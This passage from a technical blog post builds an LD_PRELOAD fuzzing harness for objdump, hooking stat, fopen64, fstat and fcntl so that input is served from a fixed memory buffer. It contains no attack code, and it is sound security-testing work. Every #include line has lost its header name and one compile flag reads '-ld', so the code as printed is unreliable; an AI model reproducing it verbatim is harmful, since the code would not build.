My idea at this point was to create a somewhat “legit” stat struct that would normally be returned for our actual file fuzzme which is just a copy of /bin/ls. We can store this stat struct globally and only update the size field as each new fuzz case comes through. So the timeline of our snapshot fuzzing workflow would look something like:

Our constructor function is called when our shared object is loaded
Our constructor sets up a global “legit” stat struct that we can update for each fuzzcase and pass back to callers of __xstat() trying to stat() our fuzzing target
The imaginary fuzzer runs objdump to the snapshot location
Our __xstat() hook updates the the global “legit” stat struct size field and copies the stat struct into the caller’s buffer
The imaginary fuzzer restores the state of objdump to its state at snapshot time
The imaginary fuzzer copies a new input into harness and updates the input size
Our __xstat() hook is called once again, and we repeat step 4, this process occurs over and over forever.

So we’re imagining the fuzzer has some routine like this in pseudocode, even though it’d likely be cross-process and require process_vm_writev:

insert_fuzzcase(config.input_location, config.input_size_location, input, input_size) {
  memcpy(config.input_location, &input, input_size);
  memcpy(config.input_size_location, &input_size, sizeof(size_t));
}

One important thing to keep in mind is that if the snapshot fuzzer is restoring objdump to its snapshot state every fuzzing iteration, we must be careful not to depend on any global mutable memory. The global stat struct will be safe since it will be instantiated during the constructor however, its size-field will be restored to its original value each fuzzing iteration by the fuzzer’s snapshot restore routine.

We will also need a global, recognizable address to store variable mutable global data like the current input’s size. Several snapshot fuzzers have the flexibility to ignore contiguous ranges of memory for restoration purposes. So if we’re able to create some contiguous buffers in memory at recognizable addresses, we can have our imaginary fuzzer ignore those ranges for snapshot restorations. So we need to have a place to store the inputs, as well as information about their size. We would then somehow tell the fuzzer about these locations and when it generated a new input, it would copy it into the input location and then update the current input size information.

So now our constructor has an additional job: setup the input location as well as the input size information. We can do this easily with a call to mmap() which will allow us to specify an address we want our mapping mapped to with the MAP_FIXED flag. We’ll also create a MAX_INPUT_SZ definition so that we know how much memory to map from the input location.

Just by themselves, the functions related to mapping memory space for the inputs themselves and their size information looks like this. Notice that we use MAP_FIXED and we check the returned address from mmap() just to make sure the call didn’t succeed but map our memory at a different location:

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

mmap() will actually map multiples of whatever the page size is on your system (typically 4096 bytes). So, when we ask for sizeof(size_t) bytes for the mapping, mmap() is like: “Hmm, that’s just a page dude” and gives us back a whole page from 0x1336000 - 0x1337000 not inclusive on the high-end.

Random sidenote, be careful about arithmetic in definitions and macros as I’ve done here with MAX_INPUT_SIZE, it’s very easy for the pre-processor to substitute your text for the definition keyword and ruin some order of operations or even overflow a specific primitive type like int.

Now that we have memory set up for the fuzzer to store inputs and information about the input’s size, we can create that global stat struct. But we actually have a big problem. How can we call into __xstat() to get our “legit” stat struct if we have __xstat() hooked? We would hit our own hook. To circumvent this, we can call __xstat() with a special __ver argument that we know will mean that it was called from our constructor, the variable is an int so let’s go with 0x1337 as the special value. That way, in our hook, if we check __ver and it’s 0x1337, we know we are being called from the constructor and we can actually stat our real file and create a global “legit” stat struct. When I dumped a normal call by objdump to __xstat() the __version was always a value of 1 so we will patch it back to that inside our hook. Now our entire shared object source file should look like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include  /* printf */
#include  /* stat */
#include  /* exit */
#include  /* __xstat, __fxstat */
#include  /* dlsym and friends */
#include  /* mmap */
#include  /* memset */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// Our "legit" global stat struct
struct stat st;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (NULL == real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;
    }

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);
    }

    return ret;
}

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size
    _create_mem_mappings();    
}

Now if we run this, we get the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: Warning: 'fuzzme' is not an ordinary file

This is cool, this means that the objdump devs did something right and their stat() would say: “Hey, this file is zero bytes in length, something weird is going on” and they spit out this error message and exit. Good job devs!

So we have identified a problem, we need to simulate the fuzzer placing a real input into memory, to do that, I’m going to start using #ifdef to define whether or not we’re testing our shared object. So basically, if we compile the shared object and define TEST, our shared object will copy an “input” into memory to simulate how the fuzzer would behave during fuzzing and we can see if our harness is working appropriately. So if we define TEST, we will copy /bin/ed into memory, and we will update our global “legit” stat struct size member, and place the /bin/ed bytes into memory.

You can compile the shared object now to perform the test as follows:

gcc -D TEST -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ld

We also need to set up our global “legit” stat struct, the code to do that should look as follows. Remember, we pass a fake __ver variable to let the __xstat() hook know that it’s us in the constructor routine, which allows the hook to behave well and give us the stat struct we need:

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    // Create a global stat struct for our file in case someone asks, this way
    // when someone calls stat() or fstat() on our target, we can just return the
    // slightly altered (new size) stat struct &skip the kernel, save syscalls
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
    }
}

All in all, our entire harness looks like this now:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include  /* printf */
#include  /* stat */
#include  /* exit */
#include  /* __xstat, __fxstat */
#include  /* dlsym and friends */
#include  /* mmap */
#include  /* memset */
#include  /* open */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET     "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// For testing purposes, we read /bin/ed into our input buffer to simulate
// what the fuzzer would do
#define  TEST_FILE      "/bin/ed"

// Our "legit" global stat struct
struct stat st;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;
    }

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);
    }

    return ret;
}

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
    }
}

// Used for testing, load /bin/ed into the input buffer and update its size info
#ifdef TEST
static void _test_func(void) {    
    // Open TEST_FILE for reading
    int fd = open(TEST_FILE, O_RDONLY);
    if (-1 == fd) {
        printf("Failed to open '%s' during test\n", TEST_FILE);
        exit(-1);
    }

    // Attempt to read max input buf size
    ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
    close(fd);

    // Update the input size
    *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;
}
#endif

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size
    _create_mem_mappings();

    // Setup global "legit" stat struct
    _setup_stat_struct();

    // If we're testing, load /bin/ed up into our input buffer and update size
#ifdef TEST
    _test_func();
#endif
}

Now if we run this under strace, we notice that our two stat() calls are conspicuously missing.

close(3)                                = 0
openat(AT_FDCWD, "fuzzme", O_RDONLY)    = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0

We no longer see the stat() calls before the openat() and the program does not break in any significant way. So this hook seems to be working appropriately. We now need to handle the openat() and make sure we don’t actually interact with our input file, but instead trick objdump to interact with our input in memory.

Finding a Way to Hook `openat()`

My non-expert intuition tells me theres probably a few ways in which a libc function could end up calling openat() under the hood. Those ways might include the wrappers open() as well as fopen(). We also need to be mindful of their 64 variants as well (open64(), fopen64()). I decided to try the fopen() hooks first:

// Declare prototype for the real fopen and its friend fopen64 
typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
fopen_t real_fopen = NULL;

typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
fopen64_t real_fopen64 = NULL;

...

// Exploratory hooks to see if we're using fopen() related functions to open
// our input file
FILE* fopen(const char* pathname, const char* mode) {
    printf("** fopen() called for '%s'\n", pathname);
    exit(0);
}

FILE* fopen64(const char* pathname, const char* mode) {
    printf("** fopen64() called for '%s'\n", pathname);
    exit(0);
}

If we compile and run our exploratory hooks, we get the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
** fopen64() called for 'fuzzme'

Bingo, dino DNA.

So now we can flesh that hooked function out a bit to behave how we want.

Refining an `fopen64()` Hook

The definition for fopen64() is: ` FILE *fopen(const char *restrict pathname, const char *restrict mode);. The returned FILE * poses a slight problem to us because this is an opaque data structure that is not meant to be understood by the caller. Which is to say, the caller is not meant to access any members of this data structure or worry about its layout in any way. You're just supposed to use the returned FILE * as an object to pass to other functions, such as fclose()`. The system deals with the data structure there in those types of related functions so that programmers don’t have to worry about a specific implementation.

We don’t actually know how the returned FILE * will be used, it may not be used at all, or it may be passed to a function such as fread() so we need a way to return a convincing FILE * data structure to the caller that is actually built from our input in memory and NOT from the input file. Luckily, there is a libc function called fmemopen() which behaves very similarly to fopen() and also returns a FILE *. So we can go ahead and create a FILE * to return to callers of fopen64() with fuzzme as the target input file. Shoutout to @domenuk for showing me fmemopen(), I had never come across it before.

There is one key difference though. fopen() will actually obtain file descriptor for the underlying file and fmemopen(), since it is not actually openining a file, will not. So somewhere in the FILE * data structure, there is a file descriptor for the underlying file if returned from fopen() and there isn’t one if returned from fmemopen(). This is very important as functions such as int fileno(FILE *stream) can parse a FILE * and return its underlying file descriptor to the caller. Objdump may want to do this for some reason and we need to be able to robustly handle it. So we need a way to know if someone is trying to use our faked FILE * underlying file descriptor.

My idea for this was to simply find the struct member containing the file descriptor in the FILE * returned from fmemopen() and change it to be something ridiculous like 1337 so that if objdump ever tried to use that file descriptor we would know the source of it and could try to hook any interactions with the file descriptor. So now our fopen64() hook should look as follows:

// Our fopen hook, return a FILE* to the caller, also, if we are opening our
// target make sure we're not able to write to the file
FILE* fopen64(const char* pathname, const char* mode) {
    // Resolve symbol on demand and only once
    if (NULL == real_fopen64) {
        real_fopen64 = _resolve_symbol("fopen64");
    }

    // Check to see what file we're opening
    FILE* ret = NULL;
    if (!strcmp(FUZZ_TARGET, pathname)) {
        // We're trying to open our file, make sure it's a read-only mode
        if (strcmp(mode, "r")) {
            printf("Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
            exit(-1);
        }

        // Open shared memory FILE* and return to caller
        ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
        
        // Make sure we've never fopen()'d our fuzzing target before
        if (faked_fp) {
            printf("Attempting to fopen64() fuzzing target more than once\n");
            exit(-1);
        }

        // Update faked_fp
        faked_fp = ret;

        // Change the filedes to something we know
        ret->_fileno = 1337;
    }

    // We're not opening our file, send to regular fopen
    else {
        ret = real_fopen64(pathname, mode);
    }

    // Return FILE stream ptr to caller
    return ret;
}

You can see we:

Resolve the symbol location if it hasn’t been yet
Check to see if we’re being called on our fuzzing target input file
Call fmemopen() and open the memory buffer where our current input is in memory along with the input’s size

You may also notice a few safety checks as well to make sure things don’t go unnoticed. We have a global variable that is FILE *faked_fp that we initialize to NULL which let’s us know if we’ve ever opened our input more than once (it wouldn’t be NULL anymore on subsequent attempts to open it).

We also do a check on the mode argument to make sure we’re getting a read-only FILE * back. We don’t want objdump to alter our input or write to it in any way and if it tries to, we need to know about it.

Running our shared object at this point nets us the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: fuzzme: Bad file descriptor

My spidey-sense is telling me something tried to interact with a file descriptor of 1337. Let’s run again under strace and see what happens.

h0mbre@ubuntu:~/blogpost$ strace -E LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt

In the output, we can see some syscalls to fcntl() and fstat() both being called with a file descriptor of 1337 which obviously doesn’t exist in our objdump process, so we’ve been able to find the problem.

fcntl(1337, F_GETFD)                    = -1 EBADF (Bad file descriptor)
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1337, 0x7fff4bf54c90)             = -1 EBADF (Bad file descriptor)
fstat(1337, 0x7fff4bf54bf0)             = -1 EBADF (Bad file descriptor)

As we’ve already learned, there is no direct export in libc for fstat(), it’s one of those weird ones like stat() and we actually have to hook __fxstat(). So let’s try and hook that to see if it gets called for our 1337 file descriptor. The hook function will look like this to start:

// Declare prototype for the real __fxstat
typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
__fxstat_t real_fxstat = NULL;

...

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    printf("** __fxstat() called for __filedesc: %d\n", __filedesc);
    exit(0);
}

Now we also still have that fcntl() to deal with, luckily that hook is straightforward, if someone asks for the F_GETFD aka, the flags associated with that special 1337 file descriptor, we’ll simply return O_RDONLY as those were the flags it was “opened” with, and we’ll just panic for now if someone calls it for a different file descriptor. This hook looks like this:

// Declare prototype for the real __fcntl
typedef int (*fcntl_t)(int fildes, int cmd, ...);
fcntl_t real_fcntl = NULL;

...

// Hook for fcntl
int fcntl(int fildes, int cmd, ...) {
    // Resolve fcntl symbol if needed
    if (NULL == real_fcntl) {
        real_fcntl = _resolve_symbol("fcntl");
    }

    if (fildes == 1337) {
        return O_RDONLY;
    }

    else {
        printf("** fcntl() called for real file descriptor\n");
        exit(0);
    }
}

Running this under strace now, the fcntl() call is absent as we would expect:

openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26376, ...}) = 0
mmap(NULL, 26376, PROT_READ, MAP_SHARED, 3, 0) = 0x7ff61d331000
close(3)                                = 0
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
write(1, "** __fxstat() called for __filed"..., 42) = 42
exit_group(0)                           = ?
+++ exited with 0 +++

Now we can flesh out our __fxstat() hook with some logic. The caller is hoping to retrieve a stat struct from the function for our fuzzing target fuzzme by passing the special file descriptor 1337. Luckily, we have our global stat struct that we can return after we update its size to match that of the current input in memory (as tracked by us and the fuzzer as the value at INPUT_SIZE_ADDR). So if called, we simply update our stat struct size, and memcpy our struct into their *__stat_buf. Our complete hook now looks like this:

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    // Resolve the real fxstat
    if (NULL == real_fxstat) {
        real_fxstat = _resolve_symbol("__fxstat");
    }

    int ret = -1;

    // Check to see if we're stat'ing our fuzz target
    if (1337 == __filedesc) {
        // Patch the global struct with current input size
        st.st_size = *(size_t*)INPUT_SZ_ADDR;

        // Copy global stat struct back to caller
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Normal stat, send to real fxstat
    else {
        ret = real_fxstat(__ver, __filedesc, __stat_buf);
    }

    return ret;
}

Now if we run this, we actually don’t break and objdump is able exit cleanly under strace.

Wrapping Up

To test whether or not we have done a fair job, we will go ahead and output objdump -D fuzzme to a file, and then we’ll go ahead and output the same command but with our harness shared object loaded. Lastly, we’ll run objdump -D /bin/ed and output to a file to see if our harness created the same output.

h0mbre@ubuntu:~/blogpost$ objdump -D fuzzme > /tmp/fuzzme_original.txt      
h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/harness.txt 
h0mbre@ubuntu:~/blogpost$ objdump -D /bin/ed > /tmp/ed.txt

Then we sha1sum the files:

h0mbre@ubuntu:~/blogpost$ sha1sum /tmp/fuzzme_original.txt /tmp/harness.txt /tmp/ed.txt 
938518c86301ab00ddf6a3ef528d7610fa3fd05a  /tmp/fuzzme_original.txt
add4e6c3c298733f48fbfe143caee79445c2f196  /tmp/harness.txt
10454308b672022b40f6ce5e32a6217612b462c8  /tmp/ed.txt

We actually get three different hashes, we wanted the harness and /bin/ed to output the same output since /bin/ed is the input we loaded into memory.

h0mbre@ubuntu:~/blogpost$ ls -laht /tmp
total 14M
drwxrwxrwt 28 root   root   128K Apr  3 08:44 .
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 ed.txt
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 harness.txt
-rw-rw-r--  1 h0mbre h0mbre 2.2M Apr  3 08:42 fuzzme_original.txt

Ah, they are the same length at least, that must mean there is a subtle difference and diff shows us why the hashes aren’t the same:

h0mbre@ubuntu:~/blogpost$ diff /tmp/ed.txt /tmp/harness.txt 
2c2
< /bin/ed:     file format elf64-x86-64
---
> fuzzme:     file format elf64-x86-64

The name of the file in the argv[] array is different, so that’s the only difference. In the end we were able to feed objdump an input file, but have it actually take input from an in-memory buffer in our harness.

One more thing, we actually forgot that objdump closes our file didn’t we! So I went ahead and added a quick fclose() hook. We wouldn’t have any problems if fclose() just wanted to free the heap memory associated with our fmemopen() returned FILE *; however, it would also probably try to call close() on that wonky file descriptor as well and we don’t want that. It might not even matter in the end, just want to be safe. Up to the reader to experiment and see what changes. The imaginary fuzzer should restore FILE * heap memory anyways during its snapshot restoration routine.

Conclusion

There are a million different ways to accomplish this goal, I just wanted to walk you through my thought process. There are actually a lot of cool things you can do with this harness, one thing I’ve done is actually hook malloc() to fail on large allocations so that I don’t waste fuzzing cycles on things that will eventually timeout. You can also create an at_exit() choke point so that no matter what, the program executes your at_exit() function every time it is exiting which can be useful for snapshot resets if the program can take multiple exit paths as you only have to cover the one exit point.

Hopefully this was useful to some! The complete code to the harness is below, happy fuzzing!

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include  /* printf */
#include  /* stat */
#include  /* exit */
#include  /* __xstat, __fxstat */
#include  /* dlsym and friends */
#include  /* mmap */
#include  /* memset */
#include  /* open */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET     "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// For testing purposes, we read /bin/ed into our input buffer to simulate
// what the fuzzer would do
#define  TEST_FILE      "/bin/ed"

// Our "legit" global stat struct
struct stat st;

// FILE * returned to callers of fopen64() 
FILE *faked_fp = NULL;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Declare prototype for the real fopen and its friend fopen64 
typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
fopen_t real_fopen = NULL;

typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
fopen64_t real_fopen64 = NULL;

// Declare prototype for the real __fxstat
typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
__fxstat_t real_fxstat = NULL;

// Declare prototype for the real __fcntl
typedef int (*fcntl_t)(int fildes, int cmd, ...);
fcntl_t real_fcntl = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("** Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;
    }

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);
    }

    return ret;
}

// Exploratory hooks to see if we're using fopen() related functions to open
// our input file
FILE* fopen(const char* pathname, const char* mode) {
    printf("** fopen() called for '%s'\n", pathname);
    exit(0);
}

// Our fopen hook, return a FILE* to the caller, also, if we are opening our
// target make sure we're not able to write to the file
FILE* fopen64(const char* pathname, const char* mode) {
    // Resolve symbol on demand and only once
    if (NULL == real_fopen64) {
        real_fopen64 = _resolve_symbol("fopen64");
    }

    // Check to see what file we're opening
    FILE* ret = NULL;
    if (!strcmp(FUZZ_TARGET, pathname)) {
        // We're trying to open our file, make sure it's a read-only mode
        if (strcmp(mode, "r")) {
            printf("** Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
            exit(-1);
        }

        // Open shared memory FILE* and return to caller
        ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
        
        // Make sure we've never fopen()'d our fuzzing target before
        if (faked_fp) {
            printf("** Attempting to fopen64() fuzzing target more than once\n");
            exit(-1);
        }

        // Update faked_fp
        faked_fp = ret;

        // Change the filedes to something we know
        ret->_fileno = 1337;
    }

    // We're not opening our file, send to regular fopen
    else {
        ret = real_fopen64(pathname, mode);
    }

    // Return FILE stream ptr to caller
    return ret;
}

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    // Resolve the real fxstat
    if (NULL == real_fxstat) {
        real_fxstat = _resolve_symbol("__fxstat");
    }

    int ret = -1;

    // Check to see if we're stat'ing our fuzz target
    if (1337 == __filedesc) {
        // Patch the global struct with current input size
        st.st_size = *(size_t*)INPUT_SZ_ADDR;

        // Copy global stat struct back to caller
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Normal stat, send to real fxstat
    else {
        ret = real_fxstat(__ver, __filedesc, __stat_buf);
    }

    return ret;
}

// Hook for fcntl
int fcntl(int fildes, int cmd, ...) {
    // Resolve fcntl symbol if needed
    if (NULL == real_fcntl) {
        real_fcntl = _resolve_symbol("fcntl");
    }

    if (fildes == 1337) {
        return O_RDONLY;
    }

    else {
        printf("** fcntl() called for real file descriptor\n");
        exit(0);
    }
}

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("** Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("** Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
